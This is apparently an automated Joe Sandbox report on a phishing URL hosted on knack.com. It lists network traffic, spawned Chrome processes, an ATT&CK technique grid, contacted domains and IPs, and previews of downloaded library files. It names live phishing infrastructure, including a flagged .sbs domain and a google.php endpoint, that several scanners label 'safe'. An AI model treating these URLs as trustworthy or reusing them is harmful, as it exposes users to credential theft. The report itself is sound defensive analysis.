      Source: unknownHTTPS traffic detected: 13.216.201.204:443 -> 192.168.2.17:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.17:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.17:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.17:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.17:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.17:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.17:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.17:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.17:49774 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.17:49776 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.17:49772 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 119.28.146.206:443 -> 192.168.2.17:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.17:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.62.10.46:443 -> 192.168.2.17:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.62.10.46:443 -> 192.168.2.17:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.17:49781 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.17:49782 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.17:49786 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6236_573652270
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6236_573652270
      Source: classification engineClassification label: mal60.phis.win@25/26@56/320
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,1017552546778329204,10486880140214220164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://mahoganydevelopment.knack.com/untitled-app"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2004,i,1017552546778329204,10486880140214220164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      12
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Extra Window Memory Injection
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Extra Window Memory Injection
      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://mahoganydevelopment.knack.com/untitled-app0%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://cdn1.cloud-database.co/namespace/scripts/k_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.js0%Avira URL Cloudsafe
      https://mahoganydevelopment.secuefilett.sbs/ZQbNk0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9271c1802da2187f&lang=auto0%Avira URL Cloudsafe
      https://appcdn.cloud-database.co/67e58d42813408027e860f5a/custom/main.js?1743108574483&_=17431085744840%Avira URL Cloudsafe
      https://mahoganydevelopment.knack.com/manifest.json0%Avira URL Cloudsafe
      https://mahoganydevelopment.knack.com/favicon.ico0%Avira URL Cloudsafe
      https://cdn1.cloud-database.co/renderer/css/v2/themes/theme-kn-beta_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.min.css0%Avira URL Cloudsafe
      https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.3.3/underscore-min.js0%Avira URL Cloudsafe
      https://loader.knack.com/v1/applications/67e58d42813408027e860f5a?callback=jQuery18105310735734474465_1743108572608&_=17431085729400%Avira URL Cloudsafe
      https://us-east-1-renderer-read.knack.com/api/xdc.html?xdm_e=https%3A%2F%2Fmahoganydevelopment.knack.com&xdm_c=default4447&xdm_p=10%Avira URL Cloudsafe
      https://cdn1.cloud-database.co/renderer/css/jquery.fancybox-1.3.4.css0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ke9o1/0x4AAAAAABB8wf99CD1wMh0u/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
      https://us-east-1-renderer-write.knack.com/api/xdc.html?xdm_e=https%3A%2F%2Fmahoganydevelopment.knack.com&xdm_c=default4448&xdm_p=10%Avira URL Cloudsafe
      https://cdn1.cloud-database.co/renderer/css/v2/renderer_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.v2.min.css0%Avira URL Cloudsafe
      https://cdnjs.cloudflare.com/ajax/libs/easyXDM/2.4.20/easyXDM.min.js0%Avira URL Cloudsafe
      https://cdn1.cloud-database.co/renderer/css/fonts.css0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1855224156:1743107274:-NPh796mR9Wm24gVmt_tL_rEwfMo1uK-sCHsRvbYTUo/9271c1802da2187f/57jg48eQSEfJLNSB_jKEThLQVHZWN1WawqgL0XmPvew-1743108582-1.1.1.1-HpVD1_RbA2r5zYemH610CztidO2D48zOmp5ZQhU.AbnoCtHY8DZLJqaF7DijxKBh0%Avira URL Cloudsafe
      https://appcdn.cloud-database.co/67e58d42813408027e860f5a/custom/main.css?17431085737060%Avira URL Cloudsafe
      https://mahoganydevelopment.secuefilett.sbs/favicon.ico0%Avira URL Cloudsafe
      https://cdnjs.cloudflare.com/ajax/libs/easyXDM/2.4.20/json2.min.js0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9271c1802da2187f/1743108583508/yZ3-l4iYq0BMia80%Avira URL Cloudsafe
      https://7074924506.sbs/google.php0%Avira URL Cloudsafe
      https://a.nel.cloudflare.com/report/v4?s=2S7WWDGoCt6Ft5ECfRy1nkUvvuwGtAfuXRkFmzdSYTrcLTbpsD5eGNpH49WbLdDAyooC3FHA2t3VTUG74ZHeppqF2mesV9yLdIQTA%2B4d6Rjhx%2FJUjWKvByQ%2Fq2nUkLJC3vRltq7rYdsyYGDikLHfEeaemd3Mng%3D%3D0%Avira URL Cloudsafe
      https://7074924506-1317754460.cos.ap-seoul.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/9271c1802da2187f/1743108583509/15a5bd1d1a05f1b5c84f56aeebc3e50760038a17fef8219c3d66031d187105f7/65NsV00LQOE-YSo0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      mailmeteor.com
      104.21.92.58
      truefalse
        high
        stackpath.bootstrapcdn.com
        104.18.10.207
        truefalse
          high
          s-part-0012.t-0009.t-msedge.net
          13.107.246.40
          truefalse
            high
            7074924506.sbs
            69.49.245.67
            truefalse
              unknown
              a.nel.cloudflare.com
              35.190.80.1
              truefalse
                high
                e329293.dscd.akamaiedge.net
                23.209.72.9
                truefalse
                  high
                  a-us00.kxcdn.com
                  68.70.205.2
                  truefalse
                    unknown
                    us-east-1-renderer-write.knack.com
                    18.205.131.89
                    truefalse
                      high
                      maxcdn.bootstrapcdn.com
                      104.18.10.207
                      truefalse
                        high
                        s-part-0013.t-0009.t-msedge.net
                        13.107.246.41
                        truefalse
                          high
                          us-east-1-renderer-read.knack.com
                          13.216.201.204
                          truefalse
                            high
                            cos.ap-seoul.myqcloud.com
                            119.28.146.206
                            truefalse
                              high
                              mahoganydevelopment.secuefilett.sbs
                              172.64.80.1
                              truetrue
                                unknown
                                code.jquery.com
                                151.101.66.137
                                truefalse
                                  high
                                  mahoganydevelopment.knack.com
                                  35.169.97.179
                                  truefalse
                                    unknown
                                    cdnjs.cloudflare.com
                                    104.17.25.14
                                    truefalse
                                      high
                                      challenges.cloudflare.com
                                      104.18.94.41
                                      truefalse
                                        high
                                        e1315.dsca.akamaiedge.net
                                        23.62.10.46
                                        truefalse
                                          high
                                          loader.knack.com
                                          35.169.97.179
                                          truefalse
                                            high
                                            www.google.com
                                            142.250.81.228
                                            truefalse
                                              high
                                              appcdn.cloud-database.co
                                              unknown
                                              unknownfalse
                                                unknown
                                                res.cloudinary.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  aadcdn.msftauth.net
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    7074924506-1317754460.cos.ap-seoul.myqcloud.com
                                                    unknown
                                                    unknownfalse
                                                      unknown
                                                      cdn1.cloud-database.co
                                                      unknown
                                                      unknownfalse
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/9271c1802da2187f/1743108583508/yZ3-l4iYq0BMia8false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://mahoganydevelopment.knack.com/untitled-apptrue
                                                          unknown
                                                          https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.3.3/underscore-min.jsfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://7074924506.sbs/google.phpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://mahoganydevelopment.secuefilett.sbs/ZQbNkfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://appcdn.cloud-database.co/67e58d42813408027e860f5a/custom/main.js?1743108574483&_=1743108574484false
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                            high
                                                            https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                              high
                                                              https://mahoganydevelopment.knack.com/manifest.jsonfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                                high
                                                                https://loader.knack.com/v1/applications/67e58d42813408027e860f5a?callback=jQuery18105310735734474465_1743108572608&_=1743108572940false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://mahoganydevelopment.secuefilett.sbs/ZQbNk/true
                                                                  unknown
                                                                  https://mahoganydevelopment.knack.com/favicon.icofalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                                    high
                                                                    https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                                                      high
                                                                      https://a.nel.cloudflare.com/report/v4?s=2S7WWDGoCt6Ft5ECfRy1nkUvvuwGtAfuXRkFmzdSYTrcLTbpsD5eGNpH49WbLdDAyooC3FHA2t3VTUG74ZHeppqF2mesV9yLdIQTA%2B4d6Rjhx%2FJUjWKvByQ%2Fq2nUkLJC3vRltq7rYdsyYGDikLHfEeaemd3Mng%3D%3Dfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://cdn1.cloud-database.co/renderer/css/v2/themes/theme-kn-beta_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.min.cssfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://us-east-1-renderer-read.knack.com/api/xdc.html?xdm_e=https%3A%2F%2Fmahoganydevelopment.knack.com&xdm_c=default4447&xdm_p=1false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://cdn1.cloud-database.co/renderer/css/jquery.fancybox-1.3.4.cssfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9271c1802da2187f&lang=autofalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ke9o1/0x4AAAAAABB8wf99CD1wMh0u/auto/fbE/new/normal/auto/false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                                                        high
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1855224156:1743107274:-NPh796mR9Wm24gVmt_tL_rEwfMo1uK-sCHsRvbYTUo/9271c1802da2187f/57jg48eQSEfJLNSB_jKEThLQVHZWN1WawqgL0XmPvew-1743108582-1.1.1.1-HpVD1_RbA2r5zYemH610CztidO2D48zOmp5ZQhU.AbnoCtHY8DZLJqaF7DijxKBhfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                                          high
                                                                          https://cdn1.cloud-database.co/namespace/scripts/k_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://7074924506-1317754460.cos.ap-seoul.myqcloud.com/bootstrap.min.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://us-east-1-renderer-write.knack.com/api/xdc.html?xdm_e=https%3A%2F%2Fmahoganydevelopment.knack.com&xdm_c=default4448&xdm_p=1false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdnjs.cloudflare.com/ajax/libs/easyXDM/2.4.20/easyXDM.min.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdn1.cloud-database.co/renderer/css/v2/renderer_efa5e0135cbc285f5860bfd6665b0ecf89ff0d7a.v2.min.cssfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://appcdn.cloud-database.co/67e58d42813408027e860f5a/custom/main.css?1743108573706false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdnjs.cloudflare.com/ajax/libs/easyXDM/2.4.20/json2.min.jsfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.2/jquery.min.jsfalse
                                                                            high
                                                                            https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                                              high
                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/9271c1802da2187f/1743108583509/15a5bd1d1a05f1b5c84f56aeebc3e50760038a17fef8219c3d66031d187105f7/65NsV00LQOE-YSofalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://res.cloudinary.com/dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.pngfalse
                                                                                high
                                                                                https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.pngfalse
                                                                                  high
                                                                                  https://cdn1.cloud-database.co/renderer/css/fonts.cssfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://mahoganydevelopment.secuefilett.sbs/favicon.icofalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  13.107.246.41
                                                                                  s-part-0013.t-0009.t-msedge.netUnited States
                                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                  104.18.10.207
                                                                                  stackpath.bootstrapcdn.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  13.107.246.40
                                                                                  s-part-0012.t-0009.t-msedge.netUnited States
                                                                                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                  172.67.187.19
                                                                                  unknownUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  104.18.94.41
                                                                                  challenges.cloudflare.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  142.251.40.227
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  18.205.131.89
                                                                                  us-east-1-renderer-write.knack.comUnited States
                                                                                  14618AMAZON-AESUSfalse
                                                                                  35.169.97.179
                                                                                  mahoganydevelopment.knack.comUnited States
                                                                                  14618AMAZON-AESUSfalse
                                                                                  151.101.66.137
                                                                                  code.jquery.comUnited States
                                                                                  54113FASTLYUSfalse
                                                                                  13.216.201.204
                                                                                  us-east-1-renderer-read.knack.comUnited States
                                                                                  16509AMAZON-02USfalse
                                                                                  172.64.80.1
                                                                                  mahoganydevelopment.secuefilett.sbsUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  35.190.80.1
                                                                                  a.nel.cloudflare.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  119.28.146.206
                                                                                  cos.ap-seoul.myqcloud.comChina
                                                                                  132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                                  23.62.10.46
                                                                                  e1315.dsca.akamaiedge.netUnited States
                                                                                  20940AKAMAI-ASN1EUfalse
                                                                                  23.209.72.31
                                                                                  unknownUnited States
                                                                                  20940AKAMAI-ASN1EUfalse
                                                                                  104.21.92.58
                                                                                  mailmeteor.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  142.251.35.174
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  23.209.72.9
                                                                                  e329293.dscd.akamaiedge.netUnited States
                                                                                  20940AKAMAI-ASN1EUfalse
                                                                                  1.1.1.1
                                                                                  unknownAustralia
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  172.217.165.138
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  68.70.205.4
                                                                                  unknownSwitzerland
                                                                                  44239PROINITYPROINITYDEfalse
                                                                                  104.18.95.41
                                                                                  unknownUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  142.250.80.10
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  68.70.205.2
                                                                                  a-us00.kxcdn.comSwitzerland
                                                                                  44239PROINITYPROINITYDEfalse
                                                                                  142.250.81.228
                                                                                  www.google.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  142.251.167.84
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  69.49.245.67
                                                                                  7074924506.sbsUnited States
                                                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                                                  142.251.41.3
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  104.17.25.14
                                                                                  cdnjs.cloudflare.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  IP
                                                                                  192.168.2.17
                                                                                  192.168.2.16
                                                                                  192.168.2.18
                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1650647
                                                                                  Start date and time:2025-03-27 21:48:55 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                  Sample URL:https://mahoganydevelopment.knack.com/untitled-app
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:15
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • EGA enabled
                                                                                  Analysis Mode:stream
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal60.phis.win@25/26@56/320
                                                                                  • Exclude process from analysis (whitelisted): svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 142.251.35.174, 142.251.40.227, 142.251.167.84, 142.250.65.174
                                                                                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: https://mahoganydevelopment.knack.com/untitled-app
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (32769)
                                                                                  Category:downloaded
                                                                                  Size (bytes):94840
                                                                                  Entropy (8bit):5.372946098601679
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:B8D64D0BC142B3F670CC0611B0AEBCAE
                                                                                  SHA1:ABCD2BA13348F178B17141B445BC99F1917D47AF
                                                                                  SHA-256:47B68DCE8CB6805AD5B3EA4D27AF92A241F4E29A5C12A274C852E4346A0500B4
                                                                                  SHA-512:A684ABBE37E8047C55C394366B012CC9AE5D682D29D340BC48A37BE1A549AECED72DE6408BEDFED776A14611E6F3374015B236FBF49422B2982EF18125FF47DC
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.2/jquery.min.js
                                                                                  Preview:/*! jQuery v1.7.2 jquery.com | jquery.org/license */.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTyp
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (19553)
                                                                                  Category:downloaded
                                                                                  Size (bytes):20736
                                                                                  Entropy (8bit):5.440525684236968
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:3D89699DE94690DF02FA5EB8D3F92741
                                                                                  SHA1:5E86B86ADA8B2CB39F6B31306C1090D41D7797B1
                                                                                  SHA-256:266AAD0852697363604E637789291D46A552531739A69D36E7D63FB9A464EABE
                                                                                  SHA-512:9C929665FE63E2C7BC80F117DE64444012AE5C92EFD8D6C65839F8213231D2C13D8DCD50FF1A6E17C10851686AC698AF71C9C3CE8519CB8A2D63B034799FDE60
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/easyXDM/2.4.20/easyXDM.min.js
                                                                                  Preview:/**. * easyXDM. * http://easyxdm.net/. * Copyright(c) 2009-2011, .yvind Sean Kinsey, oyvind@kinsey.no.. *. * Permission is hereby granted, free of charge, to any person obtaining a copy. * of this software and associated documentation files (the "Software"), to deal. * in the Software without restriction, including without limitation the rights. * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. * copies of the Software, and to permit persons to whom the Software is. * furnished to do so, subject to the following conditions:. *. * The above copyright notice and this permission notice shall be included in. * all copies or substantial portions of the Software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OT
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):2309
                                                                                  Entropy (8bit):3.9533709859154516
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:26A555918CCCAC480C5DC4845ECC04E1
                                                                                  SHA1:3B9F8C9C19902E4751C392E8764F612ED60F2818
